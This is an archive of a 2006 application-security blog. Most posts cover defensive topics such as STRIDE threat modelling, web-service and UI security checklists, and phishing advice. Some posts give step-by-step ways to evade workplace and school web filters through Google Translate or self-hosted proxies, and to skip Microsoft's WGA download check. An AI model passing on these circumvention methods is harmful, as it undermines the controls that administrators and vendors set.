Friday, December 22, 2006

Using Google to View MySpace or Any Restricted Site

Most companies and schools employ proxy servers to filter unwanted sites so employees won't waste precious company resources surfing sites that the companies deem unproductive. While the use of proxy servers to block unwanted sites may be understandable in commercial cases, there are also companies that are overdoing it, banning almost all websites and creating a lot of inconvenience to their employees.

If you are in such an environment, what can you do about it? One way is to use an anonymous proxy server (such as http://www.spysurfing.com/). But once the system administrator learns about this, he will likely block this site as well. A much more foolproof way is to use Google (yes, you read that right).


Google Translate is a translation service provided by Google to help you translate text or web pages to the language you desire. Some of the languages supported include English, Simplified Chinese, Spanish, French, German, Korean, Japanese, etc.

If you want to translate a page from one language to another, here is the URL format:

http://www.google.com/translate?langpair=en|es&u=www.websiteurl.com

where en|es is the language pair to translate from one language to the other (here it is English to Spanish), and www.websiteurl.com is the site you want to translate.

An interesting workaround to bypass your proxy server is to use Google Translate to translate the page you want to view from English to English, like this:

http://www.google.com/translate?langpair=en|en&u=www.websiteurl.com

Here, since the origin language and the destination language are the same, Google Translate does not perform any translation and hence simply acts as a forwarder and forwards the page you want to view directly to you. As an example, if your workplace/school has blocked MySpace.com, you can use the following URL to view it:

http://www.google.com/translate?langpair=en|en&u=www.myspace.com

Using Google Translate to bypass your proxy servers does not work all of the time. In some instances, it does not work at all. And in some cases, Google Translate will only display the text of the site you want to view (the images will not load), while in other cases you may need to translate the page to other languages before you can view its content.

Monday, November 20, 2006

UI Security Check #1

I was trying to collate a few checks for Web UI Security. Here are somethings for check ONE....
I invite people to put in their suggestions and comments for the same.

#1. Does the UI disclose information that might compromise the security of the system?

  • Don’t provide information in error messages that might compromise the security of the system.
  • Don’t reveal data store locations and URL’s when they are not necessary
  • Mask sensitive information such as SQL Server name, User ID, Password
  • Don’t return errors with cross-site scripts
  • Don’t allow links to open executables
  • Don’t provide error information with clickable links. Convert links to plain text to encourage these to be scrutinized prior to being launched
  • Ensure that logs are correctly stripped of sensitive information

Relevance: Developer

Wednesday, November 15, 2006

Web Services Design Security Considerations

Web Services Design Security Considerations

I. Information Gathering

  1. WSDL Retrieval: Identify web method call mechanics
  2. SOAP Error Messages
  3. Web Method Enumeration: Identify methods not published in the WSDL.
II. Parameter Manipulation
  1. Identify mishandling of numerical fields, character strings, Base64 data handling, etc.
  2. Identify SQL Injection/XPATH Injection Vulnerabilities
  3. XML input data is validated based on an agreed schema.
  4. If parameter manipulation is a concern (particularly where messages are routed through multiple intermediary nodes across multiple network links). Messages are digitally signed to ensure that they cannot be tampered with.
  5. Determine whether the logging mechanism is vulnerable to arbitrary entry creation via carriage return and line feed injection.
  6. Assess the possibility of inserting HTML tags into a HTML based log.
  7. Assess the possibility of inserting XML elements and/or attributes into an XML based log.
  8. Determine the logging mechanism’s susceptibility to white space injection.
  9. Assess the ability of the web service to log messages that contain special separator characters.
  10. Assess the handling of log data after reaching the upper log size limit.
  11. Assess the web service’s susceptibility to LDAP injection.

III. Authentication and Authorization

  1. Web services that support restricted operations or provide sensitive data require and support authentication.
  2. Where appropriate, access to publicly accessible Web methods is restricted using declarative principle permission demands.

IV. Sensitive Data

  1. Sensitive data in Web service SOAP messages is encrypted using XML encryption OR messages are only passed over encrypted communication channels (for example, using SSL.)
  2. Identify the encryption cipher used in the application.
  3. Determine the items within web service communications that are encrypted.
  4. Determine the items within web service communications that are protected by message integrity checks.

V. Exception Handling

  1. SOAP Exceptions are thrown and returned to the client using the standard SOAP element.
  2. If application-level exception handling is required a custom SOAP extension is used.

VI. Auditing & Logging

  1. The Web service logs transactions and key operations.

VII. Proxy Considerations

  1. The URL Behavior property of the Web reference is set to dynamic for added flexibility.
  2. The endpoint address in Web Services Description Language (WSDL) is checked for validity.

VIII. Configuration

  1. Unnecessary Web service protocols, including HTTP GET and HTTP POST, are disabled.
  2. The Web service runs using a least-privileged process account.
  3. Debugging and Tracing are disabled.
  4. Identify directory traversal vulnerabilities.
  5. Assess the level of information disclosure from temporary files.

Wednesday, November 08, 2006

Alternative to IE and Firefox

An interesting alternative is SecureIE (www.secureie.com) which costs 30$ and seems
to outperform Firefox and IE in the security field (http://tinyurl.com/bjayn).

Friday, October 20, 2006

Design Considerations for Security

1. Do not trust on Client-User Input. Security decisions should not rely on client-side validations; they are made on the server side

2. Identify application to fail gracefully. An approach to exception management should be such that does not reveal any internal software information.

3. Partition the application into public accessible and restricted areas. Isolate higher privileged sections of the application.

4. Granular authorization check for pages and directories.

5. Web controls, user controls, and resource access code are all partitioned in their own assemblies for granular security

6. Mechanisms have been identified to secure credentials, authentication tickets, and other sensitive information over network and in persistent stores

Thursday, October 12, 2006

Firefox popups

Firefox popups

Like you, I love Firefox for many reasons, including popup blocking. So over the last few weeks I’ve been surprised to see occasional popups.

It turns out that some clever people figured out that you could launch popups from Flash, getting around the Firefox default settings.

Fortunately, you can get around it:

1. Type about:config into the Firefox location bar.
2. Right-click on the page and select New and then Integer.
3. Name it privacy.popups.disable_from_plugins
4. Set the value to 2.

The possible values are:

* 0: Allow all popups from plugins.
* 1: Allow popups, but limit them to dom.popup_maximum.
* 2: Block popups from plugins.
* 3: Block popups from plugins, even on whitelisted sites.

Perspective of Performance and Security in IT

Performance and security are like brothers in IT. They are similar and yet they fight each other at times.

Both performance and security are important inherent qualities in IT systems. Who would not want a fast and secured IT system? You want your home computer to be fast and secured. The bank CEO wants his Internet banking system to be fast and secured for his customers.

This was a very nice article on ACE Team Blog. If you wish to read more...

Here it is: http://blogs.msdn.com/ace_team/archive/2006/07/03/655524.aspx

The Oracle Global Product Security Blog

Have you ever seen this?

The Oracle Global Product Security Blog

Oracle getting committed on security by providing rating to vulnerabilities at the security blog...:)

Security researchers have criticized Oracle in the past for the time the company has taken to fix vulnerabilities.

In July 2005, security experts at Red Database Security outed six flaws, claiming that the company had more than 650 days to fix the security issues.


Peter Finnigan, who first noted the change in policy has provided a great list of tools for auditing and testing oracle databases. If you get a chance, do visit his site at :
http://www.petefinnigan.com

Developing More-Secure Microsoft® ASP.NET 2.0 Applications Now Available

A new book in the Secure Software Development Series, this time from Dominick Baier is now available from Microsoft Press.

It covers ASP.NET 2.0 security features as well as security defenses and design and coding best practices. There’s also a chapter on the not-so-well-understood aspect of building and deploying least-privilege and partial trust ASP.NET 2.0 applications. This is a must-read chapter for Web site hosters.

You can get more info about the book here.

Monday, October 09, 2006

Spoofing threats are usually associated with a wily hacker being able to impersonate a valid system user or resource to get access to the system and thereby compromise system security.

Tampering with data involves the malicious modification of system or user data with or without detection.

Repudiation threats are associated with users—malicious or otherwise—who can deny performing an action without administrators having any way to prove otherwise. An example of a reputability threat is a user performing an illegal operation in a system that lacks the ability to trace such operations.

Information disclosure threats involve the compromising of private or business-critical information through the exposure of that information to individuals who are not supposed to see it.

Denial of service (DoS) threats when carried out deny service to valid users—for example, by making the system temporarily unavailable or unusable or by forcing a reboot or restart of the user’s machine.

Elevation of privilege: In this type of threat, an unprivileged user gains privileged access and thereby has sufficient access to compromise or destroy the entire system.

Friday, September 22, 2006

Attacks against IIS

IIS is one of the most widely used Web server platforms on the Internet.
Microsoft's Web Server has been the frequent target over the years.
It has been attacked by various vulnerabilities.

Examples include:
  • ::$DATA vulnerability
  • showcode.asp vulnerability
  • Piggy backing vulnerability
  • Privilege command execution
  • Buffer Overflow exploits (IIShack.exe)
IIS Components

  • IIS relies heavily on a collection of DLLs that work together with the main server process, inetinfo.exe, to provide various capabilities.
  • Example: Server side scripting, Content Indexing, Web Based printing etc.
  • This architecture provides attackers with different functionality to exploit via malicious input.
ISAPI DLL Buffer Overflows

  • One of the most extreme security vulnerabilities associated with ISAPI DLLs is the buffer overflow.
  • In 2001, IIS servers were ravaged by versions of the Code Red and Nimda worms which were both based on buffer overflow exploits.

Thursday, September 07, 2006

Download everything from Microsoft without WGA Check

When you want to download a file from Microsoft a WGA (windows genuine advantage) check is performed. Microsoft installs a small piece of software on your computer that contacts the Microsoft server and checks for validity. If the test fails you will not be able to download the file(s). The following method gives you the ability to download every file from Microsoft without a WGA check.

All you need is the tool mgadiag.exe and the download url of the file that you want to download. Mgadiag.exe is the Microsoft Genuine Advantage Diagnostic Tool. Start this tool and check the value of the “Download Center Code”, this should be seven chars consisting of upper case letters and numbers. Remember that code and open the website of the file that you want to download.

A download page looks similar to this one for Internet Explorer 7. All you need to do is append the following value to the url and you will be able to download the file without a WGA check.

&Hash=”download center code”

Replace the “download center code” with the code that you looked up in the mgadiag.exe tool. This code changes frequently, make sure you have the correct code before starting the downloads.

To sum it up:
  1. download mgadiag.exe
  2. start mgadiag.exe and look at the download center code
  3. visit a download page at microsoft.com
  4. append &Hash=”download center code” to the url (example &Hash=6VJPCR9), no quotation marks needed
  5. Hit enter

Microsoft is probably going to fix this soon, it is working nevertheless at the moment.

Wednesday, September 06, 2006

Free Web Proxy List

A web proxy is becoming more and more important in todays internet. Schools and Companys tend to block sites pretty quickly nowadays, especially when the blocking is directed at just a few websites and not every website in that category. Web Proxys might be able to sneak past this policies and display the site in your browser even though it is banned in the network.

How do web proxys work ?

A network bans a website either by its IP, its name or part of its name. A web proxy makes only shows its own address to the network and not the actual destination of the user. The admin of the network will think everything is fine and you are free to reach the site that is banned. The only thing that might happen is that the admin is banning the web proxy as well, but this is not a big deal either. Hundreds of web proxys exist, just switch to a new one and you are ready to visit the banned site again.

Setup your own Web Proxy:

Let us assume that all proxy websites have been banned in your network, you can´t find a single web proxy that is still working. Your best choice is to create your own web proxy at an address that only you know. All you need is the php web proxy poxy and some webspace with php to upload it to. Search google for free webspace php and you should find some hosts that allow you to use php and upload your web proxy to them.

You can alternativly use a cgi web proxy which needs a webspace with cgi enabled.
Web Proxy List:

Please not that the list does not display if the webproxy is able to handle scripts, I did not find a reliable way to make a test for all languages out there, therefor this has not been added to the list. I also removed websites that loaded slowly, displayed errors or forced you to click on an ad before you could use the service.

It is most likely that the name “proxy” might have been banned as well, try using web proxys that do not have proxy i their url, this might help.


oxys that do not have proxy i their url, this might help.

Sunday, August 20, 2006

Error document information and what it indicates.

ODBC Error Code = 37000 (Syntax error or access violation)

[Microsoft][ODBC SQL Server Driver][SQL Server]Line 4: Incorrect syntax near '='.

Data Source = "ECommerceTheArchSupport2" SQL = "SELECT QuickJump_Items.ItemId FROM QuickJump_Items WHERE QuickJump_Items.ItemId <> 0 AND QuickJumpId ="

The error occurred while processing an element with a general identifier of (CFQUERY), occupying document position (1:1) to (1:42) in the template file K:\InetPub\clients\login\http\ailment.cfm

The specific sequence of files included or processed is:
K:\INETPUB\CLIENTS\LOGIN\HTTP\AILMENT.CFM


This error message indicates that the target web application if running Microsoft SQL and discloses directory structures.

How do you use RSA for both authentication and secrecy?

RSA is based upon public key/private key concept.

For authentication one can encrypt the hash (MD5/SHA) of the data with a private key. This is known as digital signature.

And secrecy / confidentiality is achieved by encrypting the data with the public key of the target user.

Generally we dont use RSA for encryption because of key size (1024 bits).
Rather a symmetric session key (128/256 bit) is established between communicating parties and is used for encryption.

Thursday, August 03, 2006

Performance Testing Tools [.NET]

*Network Analysis Tool – application EKG by Leadbyte (http://www.leadbyte.com/)

*ASP.NET Profiling Tool – Ants Profiler by red-gate software (http://www.red-gate.com/)

Built-in Tools – IIS Log, SQL Profiler, SQL QA, Event Viewer, Perfmon/Sysmon, and ASP.NET Trace

New !! OWASP Mumbai Chapter Activity Site

Hey I have got gr8 thing to share....

I have made a new Site for detailing OWASP Mumbai Chapter Activities.
Please have a look at the site to download the presentations of OWASP Chapter Meetings, Read Meeting Notes, View Meeting Snaps and much more....

Link: http://owasp.mumbai.googlepages.com/

Do send me your response...

~ Dharmesh

Tuesday, July 25, 2006

Registrations for OWASP Mumbai Meet [31st July 15:00hrs]

Hi All,

Everyone is welcome to join us at our next chapter meet to be held on Monday, 31st of July.

Registrations for the event are free. If you are willing to attend, just send

a mail to dharmeshmm@owasp.org as a confirmation.

If you would like to speak at the event or sponsor, contact me ASAP.

Theme of Meeting: Securing Web Services

Details of the Meet:

Time: 03:00 PM - 05:00 PM

Sponsor and Venue Details:

Tech Mahindra Ltd.

Tech Mahindra Limited. Wing 1, Oberoi Estate Gardens, Chandivali, Andheri (E), Mumbai 400 072, Maharashtra, India.

Details of Event: http://www.owasp.org/index.php/Mumbai

Incase of any queries, please feel free to contact at +91 98670 75327.

Thanks & Regards,

Dharmesh M Mehta | Technology Cell | Unit 183, SDF-6 SEEPZ, Mumbai, India |
(O) +91-22-6695 2222 Ext: 1005
| (M) +91 98670 75327 | www.mastek.com

http://smartsecurity.blogspot.com

Dream as if you'll live forever. Live as if you'll die today. - James Dean

Friday, July 14, 2006

What is STRIDE

Threats faced by the application can be categorized based on the goals and purposes of the attacks. A working knowledge of these categories of threats can help you organize a security strategy so that you have planned responses to threats. STRIDE is the acronym used at Microsoft to categorize different threat types. STRIDE stands for:

Spoofing. Spoofing is attempting to gain access to a system by using a false identity. This can be accomplished using stolen user credentials or a false IP address. After the attacker successfully gains access as a legitimate user or host, elevation of privileges or abuse using authorization can begin.

Tampering. Tampering is the unauthorized modification of data, for example as it flows over a network between two computers.

Repudiation. Repudiation is the ability of users (legitimate or otherwise) to deny that they performed specific actions or transactions. Without adequate auditing, repudiation attacks are difficult to prove.

Information disclosure. Information disclosure is the unwanted exposure of private data. For example, a user views the contents of a table or file he or she is not authorized to open, or monitors data passed in plaintext over a network. Some examples of information disclosure vulnerabilities include the use of hidden form fields, comments embedded in Web pages that contain database connection strings and connection details, and weak exception handling that can lead to internal system level details being revealed to the client. Any of this information can be very useful to the attacker.

Denial of service. Denial of service is the process of making a system or application unavailable. For example, a denial of service attack might be accomplished by bombarding a server with requests to consume all available system resources or by passing it malformed input data that can crash an application process.

Elevation of privilege. Elevation of privilege occurs when a user with limited privileges assumes the identity of a privileged user to gain privileged access to an application. For example, an attacker with limited privileges might elevate his or her privilege level to compromise and take control of a highly privileged and trusted process or account.

STRIDE Threats and Countermeasures

Threat

Countermeasures

Spoofing user identity

Use strong authentication.

Do not store secrets (for example, passwords) in plaintext.

Do not pass credentials in plaintext over the wire.

Protect authentication cookies with Secure Sockets Layer (SSL).

Tampering with data

Use data hashing and signing.

Use digital signatures.

Use strong authorization.

Use tamper-resistant protocols across communication links.

Secure communication links with protocols that provide message integrity.

Repudiation

Create secure audit trails.

Use digital signatures.

Information disclosure

Use strong authorization.

Use strong encryption.

Secure communication links with protocols that provide message confidentiality.

Do not store secrets (for example, passwords) in plaintext.

Denial of service

Use resource and bandwidth throttling techniques.

Validate and filter input.

Elevation of privilege

Follow the principle of least privilege and use least privileged service accounts to run processes and access resources.

Tuesday, July 04, 2006

OWASP Mumbai - Next Meeting

Next Meeting - Tentative Monday July 31st 2006
[03:00 PM - 5:00 PM]

Invitations are OPEN for all to present at the Next OWASP Mumbai Meet.

The meeting is to be scheduled tentatively on Monday, 31st July 2006 from 3:00 to 5:00 PM.

Venue and Sponsor Details:

Tech Mahindra Ltd..

Tech Mahindra Limited. Wing 1, Oberoi Estate Gardens, Chandivali, Andheri (E), Mumbai 400 072, Maharashtra, India.

If you would like to speak, please drop in a mail at dharmeshmm@gmail.com

OWASP, the free and open application security community, has gone Wiki.

Tuesday, June 20, 2006

UI Security Checklist

Hi,

I was trying to build a security checklist for UI for Enterprise Applications . May be people can send their views regarding the same. I think of building this as as when I recieve the feedback.

Some areas that could be starting points are or the checklist should assist in:

· To Ensure that UI safeguards the critical information and is not disclosed to attackers

· Reduce level of complexity in managing security from UI

· To ensure UI enforces the best security practices

I hope to get feedback and the checklist in few days...

~ Dharmesh

Wednesday, May 31, 2006

Essential Terminology

  • Threat – An action or event that might prejudice security. A threat is a potential violation of security.
  • Vulnerability – Existence of a weakness, design, or implementation error that can lead to an unexpected, undesirable event compromising the security of the system.
  • Target of Evaluation – An IT system, product, or component that is identified/subjected as requiring security evaluation.
  • Attack – An assault on system security that derives from an intelligent threat. An attack is any action that violates security.
  • Exploit – A defined way to breach the security of an IT system through vulnerability.

Thursday, May 25, 2006

Email Evolution

  • Business email will grow by 25–30%through 2009
  • Over 60%of email is spam
  • 80%of viruses enter through the email gateway
  • 75%of a company’s Intellectual Property is now contained in email
  • 79%of companies accept email as written confirmation of approvals, orders and other transactions
  • Email is now the de facto document of record for corporate communications

Saturday, May 13, 2006

Is your server blacklisted?? Know here...

This would be a good sign that your server is being used as a relay.



ORDBhttp://www.ordb.orgOpen Relays
SBLhttp://www.spamhaus.orgSpam Sources
XBLhttp://www.spamhaus.orgCompromised Hosts
Sorbs DUHLhttp://www.sorbs.netDynamic IPs
DSBLhttp://www.dsbl.orgInsecure Servers


Friday, May 12, 2006

E-Crime and Hacking

US hacker gets five years in the slammer


A US man has been sentenced to nearly five years in prison after he was found guilty of illegally controlling around 400,000 third party PCs for the purposes of launching malware attacks.

Jeanson James Ancheta, 21, from California, rented out space on this zombie network of compromised machines for the sending of spam and malware, and also for launching denial of service attacks.

Among the machines infected by Ancheta were computers at the US military test base at China Lake in the Mojave Desert. Ancheta was ordered to pay the US Navy $15,000 in damages as well as surrendering $60,000 in proceeds from his crimes.

Ancheta advertised his zombie network - or botnet - on his own website called botz4sale.

Read More >>

Thursday, May 04, 2006

XSS Attacks

There are two ways for users to become infected by XSS attacks.

1) . Users may be either tricked into clicking on a specially crafted link (called a Non-Persistent
Attack) or,

2). User unknowingly visiting a web page embedded with malicious code (also called as a
Persistent Attack). It’s also important to note that a user’s web browser or computer does
not have to be susceptible to any well-known vulnerability.

This means that no amount of patching will help users, and we become solely dependent on a website’s security procedures for online safety.

Monday, April 17, 2006

General tips to prevent phishing

  1. Bank sends an email for verifying some information either new account holder, or withdrawal or something like that. Please contact the bank by phone (use the phone number you know) and verify the legitimacy of the mail.
  2. The golden rule is 'don't click the link' to login the bank website. Type the bank website link on your browser by hand and go to the website.
  3. Most big companies will address people with your names; if you get general mails like 'dear valued user' it could be phishing mails.

The weakest link in the security chain? You

Human error was responsible for nearly 60 per cent of information security breaches last year, a new study has found.

According to the fourth annual CompTIA (Computing Technology Industry Association) study on information security and the workforce, released on Tuesday, this figure is significantly higher than the number in 2004, when 47 per cent of security breaches were blamed on human error alone.

Despite the prominent role that human behaviour plays in information security breaches, just 29 per cent of the 574 organisations worldwide that participated in the survey said security training is a must for employees. Only 36 per cent of organisations offer security awareness training, the study found.

"The primary cause of security breaches - human error - is not being adequately addressed," Brian McCarthy, chief operating officer of CompTIA, said in a statement. "The person behind the PC continues to be the primary area where weaknesses are exposed."

Friday, March 31, 2006

Buffer Overflow

See this

http://www.insecure.org/stf/smashstack.txt

...Njoy !

Introduction to Web Services Security

Although the basic standards for web services are of great use for a lot of different scenarios, they do lack some features that are required in most real world applications, e.g. standard ways for handling security and authentication. These features are currently under development in various standardization initiatives, and some have just surfaced as standards. One of them is WS-Security, which is an OASIS standard.

Formerly Web Services authentication was something that you would have to implement yourself in your application.

Furthermore you would need to apply transport based security to guarantee confidentiality of the data communication, if your web service exchanged data over the wire that is confidential.

Earlier SOAP implementations mainly used HTTP as the transport protocol, so the assumption was made, that the security could also be based on HTTP and thus Web Services could be secured by using SSL/TSL and Basic Authentication.

Consequently SOAP does not contain any security elements itself, but instead leaves this to be handled by a combination of transport security and custom authentication implementations.

Nowadays SOAP implementations use other protocols than HTTP in an increasing level, so the need to apply security to the messages exchanged has become very important.

Also, SOAs are designed to be a number of interconnected nodes / applications that sometimes communicate through other systems, which makes point-to-point security mechanisms as SSL/TLS inadequate

Tuesday, March 21, 2006

The STRIDE Model

Many Security Evangelists use STRIDE Model for Threat Modeling an Application

Spoofing user identity - Spoofing threats are usually associated with a wily hacker being able to impersonate a valid system user or resource to get access to the system and thereby compromise system security.


Tampering with data - Tampering with data involves the malicious modification of system or user data with or without detection.


Repudiation - Repudiation threats are associated with users—malicious or otherwise—who can deny performing an action without administrators having any way to prove otherwise. An example of a reputability threat is a user performing an illegal operation in a system that lacks the ability to trace such operations.


Information Disclosure - Information disclosure threats involve the compromising of private or business-critical information through the exposure of that information to individuals who are not supposed to see it.


Denial of service - Denial of service (DoS) threats when carried out deny service to valid users—for example, by making the system temporarily unavailable or unusable or by forcing a reboot or restart of the user’s machine.


Elevation of privilege - In this type of threat, an unprivileged user gains privileged access and thereby has sufficient access to compromise or destroy the entire system.

Thursday, March 09, 2006

What is a Comprehensive Assessment?

A comprehensive assessment is a systemic assessment performed on the application code.

Security Comprehensive Assessment – This is a line-by-line assessment of the application code to ensure there are no security vulnerabilities such as clear text passwords and SQL injection problems. NOTE: if we do not have access to the source code for a 3rd-party application black-box testing will be conducted.

Privacy Comprehensive Assessment – This is an assessment of the application code to ensure there are no privacy violations such as using the incorrect privacy statement or Legal Notice and not using data input validation rules (e.g., zip codes should only have numeric values).

Sunday, February 19, 2006

Cleared the CEH

Hi ,

I have cleared the CEH (Certified Ethical Hacker) examination.

The CEH certification covers nearly every aspect of penetration testing and I would recommend to start with CEH.

My certification is an asset to my company and the value of the knowledge I carry.
It indeed has made a valuable difference to me and my company.

Regards,
Dharmesh.

Monday, January 16, 2006

Google: Yes, You Can Find Just About Anything

Hackers and security experts use various custom and open source tools tocomplete their tasks.

In fact, one of the tools they use you probably useevery time you browse the web, the Google Search Engine.I remember the first time I used the Google Search Engine years ago. I was amazed at how quickly it fulfilled my search request.

Google's huge indexof systems / information and it's ability to perform complex searches haveevolved over the years. When we performed security assessments andpenetration test, we regularly use Google to locate information thatorganizations typically want to keep private and confidential.

Full: http://castlecops.com/article-6466-nested-0-0.html

Data protection watchdog investigation finds no evidence

UK banks escape punishment over India data breach

UK banks will not face any action over a data breach in an Indian call centre last year, where an undercover newspaper reporter was allegedly sold bank and credit card details of 1,000 customers.

Monday, January 02, 2006

Automatically Hardening Web Applications using Precise Tainting.

Most web applications contain security vulnerabilities. The simple and natural ways of creating a web application are prone to SQL injection attacks and cross-site scripting attacks as well as other less common vulnerabilities. In response, many tools have been developed for detecting or mitigating common web application vulnerabilities. Existing techniques either require effort from the site developer or are prone to false positives. This paper presents a fully automated approach to securely hardening web applications. It is based on precisely tracking taintedness of data and checking specifically for dangerous content only in parts of commands and output that came from untrustworthy sources. Unlike previous work in which everything that is derived from tainted input is tainted, our approach precisely tracks taintedness within data values.